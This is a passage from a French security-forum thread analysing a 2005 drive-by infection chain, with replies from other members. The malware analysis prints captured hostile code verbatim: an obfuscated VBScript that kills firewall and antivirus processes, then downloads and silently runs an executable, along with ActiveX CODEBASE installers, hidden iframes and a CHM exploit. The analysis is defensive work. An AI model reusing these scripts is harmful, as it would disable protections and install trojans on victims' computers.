      s.Type = 1;
      s.Open();
      s.Write(x.responseBody);

      s.SaveToFile("C:\\WINDOWS\\system32\\notepad.exe",2);
      document.location="view-source:http://www.google.com/";

      </script>

      how do you get the actual chm to load? i tried...

      <object data="ms-its:mhtml:file://C:\chm.mhtml!http://www.sitehere.com/1.chm::1.htm" type="text/x-scriptlet" style="visibility:hidden">






    • 1.1.5 http://crazy-toolbar.com/new13/accjulia/web.php
      Cette page ne contient que :
      <textarea id="code" style="display:none;">
      <object data="ms-its:mhtml:file://C:\foo.mht!${PATH}/exploit.chm::/exploit.htm" type="text/x-scriptlet"></object>
      </textarea>

      <script language="javascript">
      document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('/web.php'))));
      </script>

      Soit, strictement la même chose que le point 1.1.4
      Pourquoi ? Pour assurer le coup ?
    • 1.1.6 http://crazy-toolbar.com/new10/web.php?account=julia
      Cette page contient un script en visual basic exécuté imédiatement
      <HTML>
      <HEAD>
      <HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none"
      BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no"
      MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no"
      SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>
      <SCRIPT LANGUAGE="VBScript">

      Function asdw(a,s)
      a.write(s)
      End Function
      MyFile = dirsystem&"\q123.vbs"
      drte52f = "ileSyst"
      asd13 = "ripti"
      Set qwe = CreateObject("Sc"+asd13 +"ng.F"+drte52f+"emObject")
      Set asd = qwe.CreateTextFile(MyFile, True)
      asdw asd, "WScript.Sleep(1000)" & vbcrlf
      asdw asd, "strComputer = "".""" & vbcrlf
      qwe13="ocessL"
      asdw asd, "Set objWMIService = GetObject(""winmgmts:"" _" & vbcrlf
      asdw asd, " & ""{impersonationLevel=impersonate}!\\"" & strComputer & ""\root\cimv2"")" & vbcrlf
      asdw asd, "Set colPr" + qwe13 + "ist = objWMIService.ExecQuery _ " & vbcrlf
      asdw asd, " (""SELECT * FROM Win32_Process WHERE Name = 'OUTPOST.EXE'"")" & vbcrlf
      asdw asd, "For Each objProcess in colProcessList" & vbcrlf
      asdw asd, " objProcess.Terminate()" & vbcrlf
      asdw asd, "Next" & vbcrlf
      asdw asd, "strComputer = "".""" & vbcrlf
      asdw asd, "Set objWMIService = GetObject(""winmgmts:"" _" & vbcrlf
      asdw asd, " & ""{impersonationLevel=impersonate}!\\"" & strComputer & ""\root\cimv2"")" & vbcrlf
      asdw asd, "Set colProcessList = objWMIService.ExecQuery _ " & vbcrlf
      asdw asd, " (""SELECT * FROM Win32_Process WHERE Name = 'DRWEB32.EXE'"")" & vbcrlf
      asdw asd, "For Each objProcess in colProcessList" & vbcrlf
      asdw asd, " objProcess.Terminate()" & vbcrlf
      asdw asd, "Next" & vbcrlf
      asdw asd, "Dim BD" & vbcrlf
      asdw asd, "Dim xml" & vbcrlf
      asdw asd, "WScript.Sleep(5000)" & vbcrlf
      asdw asd, "f5j545i = ""MLH""" & vbcrlf
      asdw asd, "Set xml = CreateObject(""Microsoft.X""+f5j545i+""TTP"")" & vbcrlf
      asdw asd, "xml.Open ""GET"", ""http://crazy-toolbar.com/soft.php?login=&num=10"", False" & vbCrlf
      asdw asd, "xml.Send" & vbcrlf
      asdw asd, "C=C=C=C" & vbcrlf
      asdw asd, "BD = xml.ResponseBody" & vbcrlf
      asdw asd, "C=C=C=C" & vbcrlf
      asdw asd, "Const adTypeBinary = 1" & vbcrlf
      asdw asd, "Const adSaveCreateOverWrite = 2" & vbcrlf
      asdw asd, "C=C=C=C" & vbcrlf
      asdw asd, "Dim BinaryStream" & vbcrlf
      asdw asd, "C=C=C=C" & vbcrlf
      asdw asd, "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
      asdw asd, "BinaryStream.Type = adTypeBinary" & vbcrlf
      asdw asd, "A=A=A=A" & vbcrlf
      asdw asd, "BinaryStream.Open" & vbcrlf
      asdw asd, "BinaryStream.Write BD" & vbcrlf
      asdw asd, "b=b=b=b" & vbcrlf
      asdw asd, "BinaryStream.SaveToFile dirsystem&""\sm.exe"", adSaveCreateOverWrite" & vbCrlf
      asdw asd, "Dim WshShell" & vbcrlf
      asdw asd, "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
      asdw asd, "WshShell.Run dirsystem&""\sm.exe"", 0, False" & vbCrlf
      asdw asd, "WScript.Sleep(6000)" & vbCrlf
      asd.close
      Set qwe = Nothing
      Set asd = Nothing
      Dim WshShell
      Set WshShell = CreateObject("WScript.Shell")
      WshShell.Run dirsystem&"\q123.vbs", 0, True
      Set fso = CreateObject("Scripting.FileSystemObject")
      pthe = dirsystem&"\q123.vbs"
      pth = dirsystem&"\sm.exe"
      Set f1 = fso.GetFile(pthe)
      Set f2 = fso.GetFile(pth)
      f1.Delete
      f2.Delete
      </SCRIPT>
      <script>window.close()</script>
      </HEAD>
      </html>

      J'ai souligné les "mots" interressants. Ce script tue OutPost et DrWeb (pare-feu, antivirus...) puis installe sm.exe, c'est à dire le downloader Troj/Psyme-P qui exploite la vulnérabilité ADODB stream vue juste aux points précédents 1.2.4 et 1.2.5.
      Analyse avec VirusTotal et avec Jotti
      Fortinet pour Linux/Unix appelle ce parasite VBS/Psyme.AP-tr
      Kaspersky Anti-Virus pour Linux/Unix appelle ce parasite Trojan-Downloader.VBS.Psyme.ap
      NOD32 pour Linux/Unix appelle ce parasite VBS/Psyme.AP
      Fortinet pour Windows appelle ce parasite VBS/Psyme.AP-tr
      Kaspersky pour Windows appelle ce parasite Trojan-Downloader.VBS.Psyme.ap
      McAfee pour Windows appelle ce parasite VBS/Psyme
      NOD32 pour Windows appelle ce parasite VBS/Psyme.AP
      Sybari pour Windows appelle ce parasite VBS/Psyme


    • 1.1.7 http://crazy-toolbar.com/new7/web.php?account=julia
      Cette page ne contient rien d'autre que ce script
      <script language="vbs">
      self.MoveTo 5000,5000
      Set shell=CreateObject("WScript.Shell")
      ddd = shell.SpecialFolders("Fonts") + "\" + "web.exe"
      set dot=CreateObject("Msxml2.XMLHTTP")
      dot.Open "GET", "http://crazy-toolbar.com/soft.php?login=&num=7", false
      dot.Send()
      cs = dot.responseBody
      Set fso = CreateObject("Scripting.FileSystemObject")
      Set f = fso.CreateTextFile(ddd)
      for i = 0 to UBound(cs)
      c = ascb(midb(cs, i+1, 1))
      f.Write chr(c)
      next
      f.close
      shell.run(ddd)
      window.close()
      </script>

      Analyse avec VirusTotal et avec Jotti
      ArcaVir pour Linux/Unix appelle ce parasite Trojan.HTML.VBS.Psyme.Downloader

      ClamAV pour Linux/Unix appelle ce parasite VBS.Psyme.F
      Kaspersky Anti-Virus pour Linux/Unix appelle ce parasite Trojan-Downloader.VBS.Small.p
      NOD32 pour Linux/Unix appelle ce parasite VBS/TrojanDownloader.Psyme.NAN
      ClamAV pour Windows appelle ce parasite VBS.Psyme.F
      Kaspersky pour Windows appelle ce parasite Trojan-Downloader.VBS.Small.p
      McAfee pour Windows appelle ce parasite VBS/Psyme
      NOD32 pour Windows appelle ce parasite VBS/TrojanDownloader.Psyme.NAN
      Sybari pour Windows appelle ce parasite VBS/Psyme
      TheHacker pour Windows appelle ce parasite VBS/Psyme

    • 1.1.8 http://crazy-toolbar.com/new6/web.php?account=julia
      Cette page ne contient qu'un script
      <html>
      <body>
      <script language="javascript">
      document.write("<OBJECT NAME='web' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='http://crazy-toolbar.com//61/soft.exe'>");
      document.write("<OBJECT NAME='web' CLASSID='CLSID:527196a4-b1a3-4647-931d-37ba5af23037' CODEBASE='http://crazy-toolbar.com//62/soft.exe'>");
      </script>
      </body>
      </html>

      Analyse avec VirusTotal et avec Jotti
      BitDefender pour Linux/Unix appelle ce parasite Exploit.Html.Codebase.Exec.Gen
      Dr.Web pour Linux/Unix appelle ce parasite Exploit.CodeBase
      Kaspersky Anti-Virus pour Linux/Unix appelle ce parasite Exploit.HTML.CodeBaseExec (probable variant)
      BitDefender pour Windows appelle ce parasite Exploit.Html.Codebase.Exec.Gen
      DrWeb pour Windows appelle ce parasite Exploit.CodeBase
      eTrust-Iris pour Windows appelle ce parasite JScript/Codebase!Exploit
      Kaspersky pour Windows appelle ce parasite Exploit.HTML.CodeBaseExec
      Panda pour Windows appelle ce parasite Exploit/Codebase.gen
      Sybari pour Windows appelle ce parasite Troj/Codebase-C



  • 1.2 http://66.230.175.129/connect.cgi?id=2053
    Le code source de cette page est :
    Code: Tout sélectionner
    [size=9]<html><head><title>Download</title><body bgcolor=#2c62a0 text=#ffffff onselectstart='return false;' ondragstart='return false;'><iframe src="1/gdnFR2053.exe" width=1 height=1></iframe>
    <iframe src="" width=1 height=1></iframe></body></html>[/size]

    Cette page tente donc de télécharger et exécuter un fichier appelé gdnFR2053.exe
    Je le télécharge donc (sans l'exécuter) et je l'analyse avec VirusTotal et avec Jotti.
    Il s'agit d'un fichier de 12 Ko.
    Il s'agit d'un downloader, c'est-à-dire que dès qu'il est téléchargé, il monte en processus actif et prend à son tour en charge le téléchargement et l'installation d'autres parasites (un système pyramidal).
    Certains le traite de dialer.
    Il est identifié comme :
    BehavesLike:Trojan.Downloader (BitDefender)
    Dialer-306 (ClamAV)
    Trojan-Downloader.Win32.Small.ayl (Kaspersky)
    Dialer-269 (McAfee)
    W32/Downloader (Norman)
    Trojan-Downloader.Win32.Small.ayl (Sibari)
    Bien entendu, nous ne le lançons pas et il va donc nous manquer des parasites dans l'attaque menée par le site piégé.
    Nota :
    La Sandbox de l'antivirus Norman est un peu plus parlante, ce qui est très intéressant. Une sandbox est une machine virtuelle (un pc virtuel sous un exécutif de contrôle) dans laquelle on fait tourner une application pour voir ce qu'elle tente de faire. Cette sandox signale :
    Sandbox: W32/Downloader; [ General information ]
    * File length: 11568 bytes.

    [ Changes to filesystem ]
    * Creates file C:\WINDOWS\TEMP\ldijlpmd.exe.

    [ Network services ]
    * Opens URL: http://66.117.37.7/dl?w=2053&a=1.

    [ Security issues ]
    * Starting downloaded file - potential security problem.

Donc le downloader va chercher quelque chose sur http://66.117.37.7/dl?w=2053&a=1. Eh bien, j'y vais.
  • 1.2.1 http://66.117.37.7/dl?w=2053&a=1
    Cette page tente immédiatement de télécharger et exécuter un truc appelé "dl" de type application/octet-stream (exécution automatique due aux types MIME (voir
    http://assiste.com.free.fr/p/internet_a ... s_mime.php )
    Je télécharge dl
    C'est un petit fichier de 14 KO
    Analyse avec VirusTotal et avec Jotti.
    Personne n'y trouve rien. Il doit donc s'agir soit d'un nouveau parasite soit d'une image publicitaire de type pop-up devant être affichée par un adware qui doit être dans le lot des installations faites à notre insu.
  • 1.3 <frame scrolling="no" noresize src="http://www.globolook.com/v271/wow.html">
  • 1.4 http://82.179.170.11/dia484/
    Ici ce doit être un dialer que l'on télécharge
  • 1.5 http://195.225.176.25/user.scripts/u207/dir71101380.cgi
    On exécute un script côté serveur
  • 1.6 http://qck.cc/x/in.php?wm=2353
    On en remet une couche ici
    Alors lui, c'est très simple : voici le code source de la page : téléchargement et installation d'un BHO grace à ActiveX dont le CLSID est

    031B6D43-CBC4-46A5-8E46-CF8B407C1A33 ce qui nous donne un trojan (un autre donwloader) :
    Trojan.Downloader.Domcom
    Code: Tout sélectionner
    [size=9]<HTML>
    1<iframe id="download_toolbar" style="position:absolute; visibility:hidden;"></iframe>
    <SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript">
    <!--
    var count=4;
    function onNo() {
      if(count > 0) {
        count--;
        alert("Please, click \"YES\" to download Free Software!");
        download();
      }
    }
    function download() {
      download_toolbar.document.write('<HTML><BODY>');
      download_toolbar.document.write('<OBJECT classid="clsid:031B6D43-CBC4-46A5-8E46-CF8B407C1A33" ');
      download_toolbar.document.write('codebase="ipreg32.cab" ');
      download_toolbar.document.write('onerror="parent.onNo()" ');
      download_toolbar.document.write('width=0 height=0 align=center hspace=0 vspace=0>');
      download_toolbar.document.write('<PARAM name="ID1" value="2353">');
      download_toolbar.document.write('<PARAM name="ID2" value="59187777">');
      download_toolbar.document.write('<PARAM name="ID4" value="1">');
      download_toolbar.document.write('<PARAM name="SW" value="0">');
      download_toolbar.document.write('</OBJECT>');
      download_toolbar.document.write('</BODY></HTML>');
      download_toolbar.document.close();
    }

    download();

    // -->
    </SCRIPT>
    <BODY>
    </BODY>
    </HTML>[/size]

  • 1.7 http://www.loadcash.biz/adverts/87/1.htm
    LoadCash, ça pue (avec le mot "adverts" en plus, beark beark beark...
    http://www.loadcash.biz/adverts/87/1.htm

  • 1.8 http://ambush-script.com/ld/iframe.php?acc=chern
    On va là aussi, ou on utilisera un iFrame

  • 1.9 http://www.topsearch10.com/search.php?aid=39464&q=hydrocodone
    Et voilà le topsearch qui s'installe sur votre écran, en dernier, avec immédiatement une pseudo recherche sur une molécule pharmaceutique interdite.



  • A suivre - pas fini !
    Image
    __________________
    Pierre (aka Terdef)
    Appel à donation - Le site a besoin de votre aide

    Comment je me fais avoir/infecter ? - Protéger navigateur, navigation et vie privée - Bloquer publicité et surveillance sur le Web
    Accélérer Windows - Accélérer Internet - Décontamination - Installer Malwarebytes - Forums d'entraide

    Il ne sera répondu à aucune demande de dépannage posée en MP (Messagerie Privée). Les demandes doivent être publiques et les réponses doivent profiter au public.
    Image
    Avatar de l’utilisateur
    pierre
     
    Messages: 26646
    Inscription: 20 Mai 2002, 23:01
    Localisation: Ici et maintenant

    Messagede Invité » 17 Juin 2005, 13:35

    C'est incroyable, je ne pensais pas qu'un truc aussi vicieux puisse exister :shock:
    Invité
     

    Messagede Vazkor » 17 Juin 2005, 14:24

    Bonjour,

    C'est aussi la première fois que Pierre tombe sur un truc aussi vicieux et l'étudie en détails, mais il ne faut pas s'en étonner

    C'est l'escalade des mesures et contre-mesures. Un marché juteux pour tous, sauf pour les utilisateurs.
    En réponse aux anti-malwares de plus en plus performants, les auteurs de ces cochonneries sont ou utilisent des programmeurs professionnels. L'appat du gain justifie tous les moyens pour piéger le pauvre internaute qui ne se doute de rien.

    "Un internaute averti en vaut deux" dit Emmanuel Jud sur Secuser.com

    @+
    Avatar de l’utilisateur
    Vazkor
     
    Messages: 9805
    Inscription: 05 Nov 2002, 23:39
    Localisation: Ans, BE

    Messagede Jim Rakoto » 17 Juin 2005, 14:32

    Salut

    Pierre pourrait proposer son analyse sur ce site qui semble spécialisé
    http://www.webhelper4u.com/CWS/index.html

    A+
    Mes configs Linux user #402189
    Garder toujours son sens critique en éveil en utilisant le doute rationnel comme filtre de lecture.
    Avatar de l’utilisateur
    Jim Rakoto
    Modérateur
     
    Messages: 6152
    Inscription: 09 Mar 2004, 19:49
    Localisation: Durbuy

    Messagede pierre » 17 Juin 2005, 15:43

    Bonjour Jim,

    Oui mais l'étude n'est pas finie et il y a un tableau récapitulatif, également, que je mettrais au début de l'analyse lorsqu'elle sera terminée. Pour les jours qui viennent je ne suis pas là ou je suis surbooké par un white paper, un article p2p, une kermesse des écoles, Free qui m'emprisonne, une tonne de soucis perso et un site en cours de développement.

    Cordialement
    Image
    __________________
    Pierre (aka Terdef)
    Appel à donation - Le site a besoin de votre aide

    Comment je me fais avoir/infecter ? - Protéger navigateur, navigation et vie privée - Bloquer publicité et surveillance sur le Web
    Accélérer Windows - Accélérer Internet - Décontamination - Installer Malwarebytes - Forums d'entraide

    Il ne sera répondu à aucune demande de dépannage posée en MP (Messagerie Privée). Les demandes doivent être publiques et les réponses doivent profiter au public.
    Image
    Avatar de l’utilisateur
    pierre
     
    Messages: 26646
    Inscription: 20 Mai 2002, 23:01
    Localisation: Ici et maintenant

    Messagede Jim Rakoto » 17 Juin 2005, 16:50

    Re,

    Sans compter qu'il faut encore trouver du temps pour manger, se laver - se raser, et peut-être un peu dormir :D :D

    ou je suis surbookée


    Aaah :shock:
    Euh, l'influence bénéfique de NickW ??

    A+
    Mes configs Linux user #402189
    Garder toujours son sens critique en éveil en utilisant le doute rationnel comme filtre de lecture.
    Avatar de l’utilisateur
    Jim Rakoto
    Modérateur
     
    Messages: 6152
    Inscription: 09 Mar 2004, 19:49
    Localisation: Durbuy

    Messagede nickW » 17 Juin 2005, 17:24

    Bonjour Jim qui voit tout,

    J'ai corrigé, na!

    Cordialement,
    nickW - Image
    30/07/2012: Plus de désinfection de PC jusqu'à nouvel ordre.
    Pas de demande d'analyse de log en MP (Message Privé)
    Mes configs
    Avatar de l’utilisateur
    nickW
    Modérateur
     
    Messages: 21698
    Inscription: 20 Mai 2004, 17:41
    Localisation: Dordogne/Île de France

    Messagede frenchjesus » 20 Juin 2005, 08:12

    Tout à fait d'accord avec toi Vazkor, on passe d'une phase artisanale où on bricolait quelques malwares pour faire parler de soi ou simplement pour pourrir la vie des internautes à une phase industrielle où l'on doit se débattre contre de vrais logiciels conçus par des pros, ça fait froid dans le dos.
    frenchjesus
     
    Messages: 7
    Inscription: 19 Jan 2005, 10:34

    PrécédenteSuivante

    Retourner vers Sécurité (Contamination - Décontamination)

    Qui est en ligne

    Utilisateurs parcourant ce forum: Google [Bot] et 13 invités